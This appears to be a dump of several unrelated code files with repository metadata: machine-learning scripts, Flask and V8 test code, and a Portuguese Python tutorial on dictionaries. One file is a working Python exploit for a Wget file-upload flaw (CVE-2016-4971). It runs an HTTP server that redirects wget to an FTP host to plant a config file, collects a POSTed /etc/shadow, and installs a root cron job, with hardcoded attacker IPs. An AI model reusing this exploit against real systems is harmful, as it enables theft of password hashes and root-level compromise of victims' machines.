        #    print(" ".join([str(c) for c, _ in r]))
        return img

    def load_tiles(self):
        """Read all (id, matrix) tiles from the "input" resource.

        load_resource/read_line/read_until come from SolutionABC (defined
        elsewhere in the package, not visible in this file).
        """
        with self.load_resource("input") as src:
            return [(k, m) for k, m in self.read_tiles(src)]

    def read_tiles(self, src):
        """Yield (tile_id, numpy char matrix) pairs until a blank heading."""
        while True:
            tile_heading = self.read_line(src)
            if tile_heading == "":
                return
            # Headings look like "Tile 1234:" — slice out the number.
            tile_id = int(tile_heading[5:-1])
            matrix = list(self.read_until(src, xfrm=lambda s: list(s)))
            yield tile_id, np.array(matrix)
| 29.009434 | 100 | 0.509593 |
66f5d3ec30ee3cb74953f418ac60d6f97eadd0de
| 5,233 |
py
|
Python
|
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
"""
Dicionários
OBS: Em algumas linguagens de programação, os dicionários Python são conhecidos
por mapas.
Dicionários são coleções do tipo chave/valor. (Mapeamento entre chave e valor)
#Tuplas
[0, 1, 2]
[1, 2, 3]
# Listas
(0, 1, 2)
(1, 2, 3)
Dicionários são representados por chaves {}.
print(type({}))
OBS: Sobre dicionários
- Chave e valor são separados por dois pontos 'chave:valor';
- Tanto chave quanto valor podem ser de qualquer tipo de dado;
- Podemos misturar tipos de dados;
# Criação de dicionários
# Forma1 (Mais comum)
paises = {'br': 'Brasil', 'eua': 'Estados Unidos', 'py': 'Paraguay'}
print(paises)
print(type(paises))
# Forma2 (Menos comum)
paises = dict(br='Brasil', eua='Estados Unidos', py='Paraguay')
print(paises)
print(type(paises))
# Acessando elementos
# Forma1 - Acessando via chave, da mesma forma que lista/tupla
print(paises['br'])
# print(paises['ru'])
# OBS: Caso tentamos fazer um acesso utilizando uma chave que não existe, teremos o erro KeyError
# Forma2 - Acessando via get (Recomendada)
print(paises.get('br'))
print(paises.get('ru'))
# Caso o get não encontre o objeto com a chave informada, será retornado o valor None e não será gerado KeyError
pais = paises.get('ru')
if pais:
print(f'Encontrei o país {pais}')
else:
print('Não encontrei o país')
# Podemos definir um valor padrão para caso não encontremos o objeto com a chave informada
pais = paises.get('ru', 'Não encontrado')
print(f'Encontrei o país {pais}')
# Podemos verificar se determinada chave se encontra em um dicionário
print('br' in paises)
print('ru' in paises)
print('Estados Unidos' in paises)
if 'ru' in paises:
russia = paises['ru']
# Podemos utilizar qualquer tipo de dado (int, float, string, boolean), inclusive lista, tupla, dicionário, como chaves
# de dicionários.
# Tuplas, por exemplo, são bastante interessantes de serem utilizadas como chave de dicionários, pois as mesmas
# são imutáveis.
localidades = {
(35.6895, 39.6917): 'Escritório em Tókio'
(40.7128, 74.0060): 'Escritório em Nova York'
(37.7749, 122.4194): 'Escritório em São Paulo'
}
print(localidades)
print(type(localidades))
# Adicionar elementos em um dicionário
receita = {'jan': 100, 'fev': 120, 'mar': 300}
print(receita)
print(type(receita))
# Forma1 - Mais comum
receita['abr'] = 350
print(receita)
# Forma2
novo_dado = {'mai': 500}
receita.update(novo_dado) # receita.update({'mai': 500})
print(receita)
# Atualizando dados em um dicionário
# Forma1
receita['mai'] = 550
print(receita)
# Forma2
receita.update({'mai': 600})
print(receita)
# CONCLUSÃO1: A forma de adicionar novos elementos ou atualizar dados em um dicionário é a mesma.
# CONCLUSÃO2: Em dicionários, NÂO podemos ter chaves repetidas.
# Remover dados de um dicionário
receita = {'jan': 100, 'fev': 120, 'mar': 300}
print(receita)
# Forma1 - Mais comum
ret = receita.pop('mar')
print(ret)
print(receita)
# OBS1: Aqui precisamos SEMPRE informar a chave, e caso não encontre o elemento, um KeyError é retornado.
# OBS2: Ao removermos um objeto, o valor deste objeto é sempre retornado.
# Forma2
del receita['fev']
print(receita)
# Se a chave não existir, será gerado um KeyError
# OBS: Neste caso, o valor removido não é retornado.
# Imagine que você tem um comércio eletrônico, onde temos um carrinho de compras na qual adicionamos produtos.
Carrinho de Compras:
Produto 1:
- nome;
- quantidade;
- preço;
Produto 2:
- nome;
- quantidade;
- preço;
# 1 - Poderíamos utilizar uma Lista para isso? Sim
carrinho = []
produto1 = ['PlayStation 4', 1, 2300.00]
produto2 = ['God of War 4', 1, 150.00]
carrinho.append(produto1)
carrinho.append(produto2)
print(carrinho)
# Teríamos que saber qual é o índice de cada informação no produto.
# 2 - Poderíamos utilizar uma Tupla para isso? Sim
produto1 = ('PlayStation 4', 1, 2300.00)
produto2 = ('God of War 4', 1, 150.00)
carrinho = (produto1, produto2)
print(carrinho)
# 3 - Poderíamos utilizar um Dicionário para isso? Sim
carrinho = []
produto1 = {'Nome': 'PlayStation 4', 'Quantidade': 1, 'Preço': 2300.00}
produto2 = {'Nome': 'God of War 4', 'Quantidade': 1, 'Preço': 150.00}
carrinho.append(produto1)
carrinho.append(produto2)
print(carrinho)
# Desta forma, facilmente adicionamos ou removemos produtos no carrinho e em cada produto
# podemos ter a certeza sobre cada informação.
# Métodos de dicionários
d = dict(a=1, b=2, c=3)
print(d)
print(type(d))
# Limpar o dicionário (Zerar dados)
d.clear()
print(d)
# Copiando um dicionário para outro
# Forma1 # Deep Copy
novo = d.copy()
print(novo)
novo['d'] = 4
print(d)
print(novo)
# Forma2 # Shallow Copy
novo = d
print(novo)
novo['d'] = 4
print(d)
print(novo)
"""
# Forma não usual de criação de dicionários
outro = {}.fromkeys('a', 'b')
print(outro)
print(type(outro))
usuario = {}.fromkeys(['nome', 'pontos', 'email', 'profile'], 'desconhecido')
print(usuario)
print(type(usuario))
# O método fromkeys recebe dois parâmetros: um iterável e um valor.
# Ele vai gerar para cada valor do iterável uma chave e irá atribuir a esta chave o valor informado.
veja = {}.fromkeys('teste', 'valor')
print(veja)
veja = {}.fromkeys(range(1, 11), 'novo')
print(veja)
| 19.672932 | 119 | 0.708962 |
7d2101f86882a0cc92b62811b4a431f69e0f581a
| 8,025 |
py
|
Python
|
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | 16 |
2017-09-13T10:21:40.000Z
|
2020-06-01T04:32:22.000Z
|
tests/test_gallery.py
|
goosechooser/benwaonline
|
e2879412aa6c3c230d25cd60072445165517b6b6
|
[
"MIT"
] | null | null | null |
import sys
from datetime import datetime
from io import BytesIO
import pytest
import requests_mock
from flask import current_app, request, url_for, json
from flask_login import current_user
from marshmallow import pprint
from benwaonline import mappers
from benwaonline import entities
from benwaonline.gallery import views
from benwaonline.exceptions import BenwaOnlineError, BenwaOnlineRequestError
import utils
JWKS = utils.load_test_data('test_jwks.json')
def benwa_resp():
return {
"access_token": "LnUwYsyKvQgo8dLOeC84y-fsv_F7bzvZ",
'refresh_token': 'refresh_me_thanks',
"expires_in": 3600,
"scope": "openid email",
"token_type": "Bearer"
}
def auth_payload():
return {
"iss": "https://choosegoose.benwa.com/",
"sub": "59866964",
"aud": "1LX50Fa2L80jfr9P31aSZ5tifrnLFGDy",
"iat": 1511860306,
"exp": 1511896306
}
def mock_auth_response(mocker, resp):
mock = mocker.patch('benwaonline.auth.views.benwa.authorized_response')
mock.return_value = resp
return mock
def login(client, mocker, m):
user = utils.test_user()
mocker.patch('benwaonline.auth.views.get_jwks', return_value=JWKS)
mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload())
mocker.patch('benwaonline.auth.views.handle_authorize_response', return_value=benwa_resp())
mocker.patch('benwaonline.auth.views.UserGateway.get_by_user_id', return_value=user)
return client.get(url_for('authbp.authorize_callback'), follow_redirects=False)
def signup(client, redirects=False):
form = {'adjective': 'Beautiful', 'benwa': 'Benwa', 'noun': 'Aficionado', 'submit': True}
return client.post(url_for('authbp.signup'), data=form, follow_redirects=redirects)
def logout(client):
mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload())
return client.get('/auth/logout/callback', follow_redirects=False)
def make_comment(client, post_id, data):
uri = url_for('gallery.add_comment', post_id=post_id)
return client.post(uri, data=data)
class TestShowPosts(object):
post_uri = mappers.collection_uri(entities.Post())
tag_uri = mappers.collection_uri(entities.Tag())
with open('tests/data/show_posts.json') as f:
test_data = json.load(f)
def test_empty_db(self, client):
with requests_mock.Mocker() as mock:
mock.get('/api/posts', json={'data': []})
mock.get(self.tag_uri, json={'data':[]})
response = client.get(url_for('gallery.show_posts'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True)
assert response.status_code == 200
def test_posts_exist(self, client):
posts = self.test_data['posts_with_previews']
tags = self.test_data['tags']
with requests_mock.Mocker() as mock:
mock.get('/api/posts', json=posts)
mock.get(self.tag_uri, json=tags)
response = client.get(url_for('gallery.show_posts'))
assert response.status_code == 200
response = client.get(url_for('gallery.show_posts', tags='benwa'))
assert response.status_code == 200
response = client.get(
url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True)
assert response.status_code == 200
class TestShowPost(object):
post_id = 1
post_uri = mappers.instance_uri(entities.Post(id=1))
comments_uri = mappers.resource_uri(entities.Post(id=1), 'comments')
with open('tests/data/show_post.json') as f:
test_data = json.load(f)
post = test_data['post']
comments = test_data['comments']
def test_no_post_exists(self, client, mocker):
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, status_code=404, json=utils.error_response('Post', 1))
response = client.get(
url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
with pytest.raises(BenwaOnlineRequestError):
template = views.show_post(post_id=1)
assert 'Object not found' in template
def test_post_exists_no_comments(self, client, mocker):
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, json=self.post)
mock.get('/api/posts/1/comments', json={'data':[]})
response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
def test_post_exists_comments(self, client, mocker):
self.post = self.test_data['post_comments_exist']
with requests_mock.Mocker() as mock:
mock.get(self.post_uri, json=self.post)
mock.get('/api/posts/1/comments', json=self.comments)
response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False)
assert response.status_code == 200
def test_add_post_not_authenticated(client):
test_post = {'tags': ['old_benwa', 'benwa'], 'submit': True}
assert not current_user.is_authenticated
response = client.get('/gallery/add', follow_redirects=False)
assert 'authorize' in response.headers['Location']
response = client.post('/gallery/add', data=test_post, follow_redirects=False)
assert 'authorize' in response.headers['Location']
def test_add_post_not_valid_submit(client, mocker):
test_post = {
'tags': ['old_benwa', 'benwa'],
'filename': 'bartwa.jpg',
'submit': True
}
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data',
data=test_post, follow_redirects=False)
assert response.status_code == 200
def test_add_post(client, mocker):
test_post = {
'tags': ['old_benwa', 'benwa'],
'filename': 'bartwa.jpg',
'image': (BytesIO(b'my file contents'), 'bartwa.jpg'),
'submit': True
}
mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'make_thumbnail')
mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'save_image')
user = utils.test_user().dump()
preview = entities.Preview(id=1)
image = entities.Image(id=1)
benwa_tag = entities.Tag(id=1, name='benwa')
tag = entities.Tag(id=2, name='old_benwa')
post = entities.Post(id=1, image=image, preview=preview, user=user, tags=[tag, benwa_tag])
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
mock.post('/api/previews', json=preview.dump())
mock.post('/api/images', json=image.dump())
mock.post('/api/posts', json=post.dump())
mock.get('/api/posts/1', json=post.dump())
mock.get('/api/tags', json={'data':[]})
mock.post('/api/tags', json=tag.dump())
response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data',
data=test_post, follow_redirects=False)
assert response.status_code == 302
assert 'gallery/show' in response.headers['Location']
@pytest.mark.skip
def test_add_comment(client, mocker):
form = {'content': 'its valid man','submit': True}
with client.session_transaction() as sess:
sess['access_token'] = 'Bearer ' + 'access token'
with requests_mock.Mocker() as mock:
login(client, mocker, mock)
mock.post(current_app.config['API_URL'] + '/comments')
response = client.post(url_for('gallery.add_comment', post_id=1), data=form)
@pytest.mark.skip
def test_delete_comment(client, mocker):
login(client, mocker)
assert current_user.is_authenticated
| 38.581731 | 110 | 0.669408 |
6995669a1592ee824cf447cadab2957ceab6665b
| 3,933 |
py
|
Python
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
sita1999/arangodb
|
6a4f462fa209010cd064f99e63d85ce1d432c500
|
[
"Apache-2.0"
] | 22 |
2016-07-28T03:25:31.000Z
|
2022-02-19T02:51:14.000Z
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
lipper/arangodb
|
66ea1fd4946668192e3f0d1060f0844f324ad7b8
|
[
"Apache-2.0"
] | 10 |
2016-09-30T14:57:49.000Z
|
2017-06-30T12:56:01.000Z
|
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
|
lipper/arangodb
|
66ea1fd4946668192e3f0d1060f0844f324ad7b8
|
[
"Apache-2.0"
] | 23 |
2016-08-03T17:43:32.000Z
|
2021-03-04T17:09:00.000Z
|
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import itertools
import os
import re
from testrunner.local import testsuite
from testrunner.local import utils
from testrunner.objects import testcase
FLAGS_PATTERN = re.compile(r"//\s+Flags:(.*)")
PROTOCOL_TEST_JS = "protocol-test.js"
EXPECTED_SUFFIX = "-expected.txt"
class InspectorProtocolTestSuite(testsuite.TestSuite):
def __init__(self, name, root):
super(InspectorProtocolTestSuite, self).__init__(name, root)
def ListTests(self, context):
tests = []
for dirname, dirs, files in os.walk(os.path.join(self.root), followlinks=True):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
files.sort()
for filename in files:
if filename.endswith(".js") and filename != PROTOCOL_TEST_JS:
fullpath = os.path.join(dirname, filename)
relpath = fullpath[len(self.root) + 1 : -3]
testname = relpath.replace(os.path.sep, "/")
test = testcase.TestCase(self, testname)
tests.append(test)
return tests
def GetFlagsForTestCase(self, testcase, context):
source = self.GetSourceForTest(testcase)
flags_match = re.findall(FLAGS_PATTERN, source)
flags = []
for match in flags_match:
flags += match.strip().split()
testname = testcase.path.split(os.path.sep)[-1]
testfilename = os.path.join(self.root, testcase.path + self.suffix())
protocoltestfilename = os.path.join(self.root, PROTOCOL_TEST_JS)
return [ protocoltestfilename, testfilename ] + flags
def GetSourceForTest(self, testcase):
filename = os.path.join(self.root, testcase.path + self.suffix())
with open(filename) as f:
return f.read()
def shell(self):
return "inspector-test"
def _IgnoreLine(self, string):
"""Ignore empty lines, valgrind output and Android output."""
if not string: return True
return (string.startswith("==") or string.startswith("**") or
string.startswith("ANDROID") or
# FIXME(machenbach): The test driver shouldn't try to use slow
# asserts if they weren't compiled. This fails in optdebug=2.
string == "Warning: unknown flag --enable-slow-asserts." or
string == "Try --help for options")
def IsFailureOutput(self, testcase):
file_name = os.path.join(self.root, testcase.path) + EXPECTED_SUFFIX
with file(file_name, "r") as expected:
expected_lines = expected.readlines()
def ExpIterator():
for line in expected_lines:
if line.startswith("#") or not line.strip(): continue
yield line.strip()
def ActIterator(lines):
for line in lines:
if self._IgnoreLine(line.strip()): continue
yield line.strip()
def ActBlockIterator():
"""Iterates over blocks of actual output lines."""
lines = testcase.output.stdout.splitlines()
start_index = 0
found_eqeq = False
for index, line in enumerate(lines):
# If a stress test separator is found:
if line.startswith("=="):
# Iterate over all lines before a separator except the first.
if not found_eqeq:
found_eqeq = True
else:
yield ActIterator(lines[start_index:index])
# The next block of output lines starts after the separator.
start_index = index + 1
# Iterate over complete output if no separator was found.
if not found_eqeq:
yield ActIterator(lines)
for act_iterator in ActBlockIterator():
for (expected, actual) in itertools.izip_longest(
ExpIterator(), act_iterator, fillvalue=''):
if expected != actual:
return True
return False
def GetSuite(name, root):
return InspectorProtocolTestSuite(name, root)
| 35.754545 | 83 | 0.663361 |
38e5142a0e015295b897f705f5b522fd98fa964d
| 2,834 |
py
|
Python
|
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 21 |
2016-02-06T14:30:01.000Z
|
2020-09-11T05:39:17.000Z
|
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | null | null | null |
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 7 |
2017-02-02T16:27:02.000Z
|
2021-04-30T17:14:53.000Z
|
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/shell.php'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '10.10.14.16'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.14.16'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
| 32.953488 | 145 | 0.661609 |
2a515b34a6909c06088f009b9969149b78a78fbb
| 5,013 |
py
|
Python
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/hpc/deepbsde/src/net.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define the network structure of DeepBSDE"""
import numpy as np
import mindspore.common.dtype as mstype
from mindspore import nn
from mindspore import ops as P
from mindspore import Tensor, Parameter
class DeepBSDE(nn.Cell):
"""
The network structure of DeepBSDE.
Args:
cfg: configure settings.
bsde(Cell): equation function
"""
def __init__(self, cfg, bsde):
super(DeepBSDE, self).__init__()
self.bsde = bsde
self.delta_t = bsde.delta_t
self.num_time_interval = bsde.num_time_interval
self.dim = bsde.dim
self.time_stamp = Tensor(np.arange(0, cfg.num_time_interval) * bsde.delta_t)
self.y_init = Parameter(np.random.uniform(low=cfg.y_init_range[0],
high=cfg.y_init_range[1],
size=[1]).astype(np.float32))
self.z_init = Parameter(np.random.uniform(low=-0.1, high=0.1, size=[1, cfg.dim]).astype(np.float32))
self.subnet = nn.CellList([FeedForwardSubNet(cfg.dim, cfg.num_hiddens)
for _ in range(bsde.num_time_interval-1)])
self.generator = bsde.generator
self.matmul = P.MatMul()
self.sum = P.ReduceSum(keep_dims=True)
def construct(self, dw, x):
"""repeat FeedForwardSubNet (num_time_interval - 1) times."""
all_one_vec = P.Ones()((P.shape(dw)[0], 1), mstype.float32)
y = all_one_vec * self.y_init
z = self.matmul(all_one_vec, self.z_init)
for t in range(0, self.num_time_interval - 1):
y = y - self.delta_t * (self.generator(self.time_stamp[t], x[:, :, t], y, z)) + self.sum(z * dw[:, :, t], 1)
z = self.subnet[t](x[:, :, t + 1]) / self.dim
# terminal time
y = y - self.delta_t * self.generator(self.time_stamp[-1], x[:, :, -2], y, z) + self.sum(z * dw[:, :, -1], 1)
return y
class FeedForwardSubNet(nn.Cell):
"""
Subnet to fit the spatial gradients at time t=tn
Args:
dim (int): dimension of the final output
train (bool): True for train
num_hidden list(int): number of hidden layers
"""
def __init__(self, dim, num_hiddens):
super(FeedForwardSubNet, self).__init__()
self.dim = dim
self.num_hiddens = num_hiddens
bn_layers = [nn.BatchNorm1d(c, momentum=0.99, eps=1e-6, beta_init='normal', gamma_init='uniform')
for c in [dim] + num_hiddens + [dim]]
self.bns = nn.CellList(bn_layers)
dense_layers = [nn.Dense(dim, num_hiddens[0], has_bias=False, activation=None)]
dense_layers = dense_layers + [nn.Dense(num_hiddens[i], num_hiddens[i + 1], has_bias=False, activation=None)
for i in range(len(num_hiddens) - 1)]
# final output should be gradient of size dim
dense_layers.append(nn.Dense(num_hiddens[-1], dim, activation=None))
self.denses = nn.CellList(dense_layers)
self.relu = nn.ReLU()
def construct(self, x):
"""structure: bn -> (dense -> bn -> relu) * len(num_hiddens) -> dense -> bn"""
x = self.bns[0](x)
hiddens_length = len(self.num_hiddens)
for i in range(hiddens_length):
x = self.denses[i](x)
x = self.bns[i+1](x)
x = self.relu(x)
x = self.denses[hiddens_length](x)
x = self.bns[hiddens_length + 1](x)
return x
class WithLossCell(nn.Cell):
"""Loss function for DeepBSDE"""
def __init__(self, net):
super(WithLossCell, self).__init__()
self.net = net
self.terminal_condition = net.bsde.terminal_condition
self.total_time = net.bsde.total_time
self.sum = P.ReduceSum()
self.delta_clip = 50.0
self.selete = P.Select()
def construct(self, dw, x):
y_terminal = self.net(dw, x)
delta = y_terminal - self.terminal_condition(self.total_time, x[:, :, -1])
# use linear approximation outside the clipped range
abs_delta = P.Abs()(delta)
loss = self.sum(self.selete(abs_delta < self.delta_clip,
P.Square()(delta),
2 * self.delta_clip * abs_delta - self.delta_clip * self.delta_clip))
return loss
| 41.775 | 120 | 0.596649 |
2aadb54c111d2e210d227f1fd406003b8af9a9a2
| 2,174 |
py
|
Python
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/EDSR/export.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
##############export checkpoint file into air, mindir models#################
python export.py
"""
import os
import numpy as np
import mindspore as ms
from mindspore import Tensor, export, context
from src.utils import init_net
from model_utils.config import config
from model_utils.device_adapter import get_device_id
from model_utils.moxing_adapter import moxing_wrapper
context.set_context(mode=context.GRAPH_MODE, device_target=config.device_target)
if config.device_target == "Ascend":
context.set_context(device_id=get_device_id())
MAX_HR_SIZE = 2040
@moxing_wrapper()
def run_export():
"""
run export
"""
print(config)
cfg = config
if cfg.pre_trained is None:
raise RuntimeError('config.pre_trained is None.')
net = init_net(cfg)
max_lr_size = MAX_HR_SIZE // cfg.scale
input_arr = Tensor(np.ones([1, cfg.n_colors, max_lr_size, max_lr_size]), ms.float32)
file_name = os.path.splitext(os.path.basename(cfg.pre_trained))[0]
file_name = file_name + f"_InputSize{max_lr_size}"
file_path = os.path.join(cfg.output_path, file_name)
file_format = 'MINDIR'
num_params = sum([param.size for param in net.parameters_dict().values()])
export(net, input_arr, file_name=file_path, file_format=file_format)
print(f"export success", flush=True)
print(f"{cfg.pre_trained} -> {file_path}.{file_format.lower()}, net parameters = {num_params/1000000:>0.4}M",
flush=True)
if __name__ == '__main__':
run_export()
| 33.446154 | 113 | 0.702852 |
934c122981015f026c29b97624efde2c5f90f58d
| 4,140 |
py
|
Python
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""verify by svm"""
import time
import argparse
import numpy as np
from mindspore import context
from sklearn import svm
from sklearn.preprocessing import StandardScaler
def verify_cifar10():
"""
verify on cifar10 dataset
"""
label_path_train = "./preprocess_Result/cifar10_label_ids_train.npy"
label_path_test = "./preprocess_Result/cifar10_label_ids_test.npy"
label_set_train = np.load(label_path_train, allow_pickle=True)
label_set_test = np.load(label_path_test, allow_pickle=True)
result_set_train = []
for i in range(0, 500):
result_file_train = './result_Files_train/dcgan_data_bs100_' + str(i) + "_train_0.bin"
result = np.fromfile(result_file_train, dtype=np.float32).reshape(-1, 14336)
result_set_train.append(result)
result_set_train = np.array(result_set_train)
result_set_train = result_set_train.reshape(-1, 14336)
label_set_train = label_set_train.reshape(-1, 1)
label_set_train = label_set_train.flatten()
result_set_test = []
for i in range(0, 100):
result_file_test = './result_Files_test/dcgan_data_bs100_' + str(i) + "_test_0.bin"
result = np.fromfile(result_file_test, dtype=np.float32).reshape(-1, 14336)
result_set_test.append(result)
result_set_test = np.array(result_set_test)
result_set_test = result_set_test.reshape(-1, 14336)
label_set_test = label_set_test.reshape(-1, 1)
label_set_test = label_set_test.flatten()
print("result_set_train.shape: ", result_set_train.shape)
print("label_set_train.shape: ", label_set_train.shape)
print("result_set_test.shape: ", result_set_test.shape)
print("label_set_test.shape: ", label_set_test.shape)
print("============================standradScaler")
standardScaler = StandardScaler()
standardScaler.fit(result_set_train)
